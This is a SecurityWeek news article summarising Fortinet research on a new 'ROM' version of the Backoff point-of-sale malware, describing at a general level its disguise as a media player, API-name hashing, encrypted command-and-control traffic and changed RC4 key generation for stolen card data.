Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

New Version of Backoff PoS Malware Appears: Fortinet

Researchers at Fortinet said they have encountered a new version of the notorious Backoff malware targeting point-of-sale systems.

Researchers at Fortinet said they have encountered a new version of the notorious Backoff malware targeting point-of-sale systems.

Backoff has been at the center of much of the data breach news this year. In August, the U.S. Secret Service estimated more than 1,000 businesses in the country had been infected.

According to Fortinet, unlike previous versions, the latest edition no longer uses a version number in the malware body. Instead, it uses the version name ROM. While it works very similarly to previous versions, changes have been made to make analysis and detection more difficult.

“During the installation phase,” blogged Fortinet’s Hong Kei Chan, “Backoff drops a copy of itself on the infected machine and creates a number of autorun registry entries to ensure persistence. This latest version is no different, but instead of disguising itself as a Java component as with previous versions, it pretends to be a media player with the file name mplayerc.exe.”

Advertisement. Scroll to continue reading.

“In addition, unlike previous versions where the CopyFileA API is called to drop a copy of itself, ROM calls the WinExec API,” the researcher continued. “The command line used is shown in the following figure. To hinder the analysis process, the malware author utilizes a very common technique by replacing API names with the hashed values, and a custom hashing function is called to look up the API name with the equivalent hash value.”

The malware’s functionality for stealing credit card data is still very much the same and has the ability to parse for both Track 1 and Track 2 data. In this version however, the malware has two additional features: hashing the names of the blacklist processes and storing the stolen credit card information on the local system, the researcher noted.

Changes have also been made to components of the command-and-control (C&C) communication to avoid detection. The malware communicates with the C&C server via port 443, encrypting the traffic and making detection more difficult. The field names of the query string have also been changed, and the contents of some of the fields have additional Base64 encoding.  

“The stolen credit card data is still encoded with RC4 and Base64, but the algorithm for generating the RC4 key has been slightly modified,” the researcher wrote. “Previously, the RC4 key was produced from three components: (1) a randomly generated seven-character string, (2) a hardcoded string, and (3) the user logon name and computer name (e.g. “bot @ FTNT”) that were concatenated and then hashed with an MD5 algorithm. In the new version, there is a slight modification in the concatenated strings.”

The new version also no longer supports keylogging.

“The functions of ROM are very similar to the version preceding it, but modifications have been made by the malware author for evading detection and hindering the analysis process,” the researcher noted.

Written By

Marketing professional with a background in journalism and a focus on IT security.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Cyberwarfare

An engineer recruited by intelligence services reportedly used a water pump to deliver Stuxnet, which reportedly cost $1-2 billion to develop.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Malware & Threats

Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.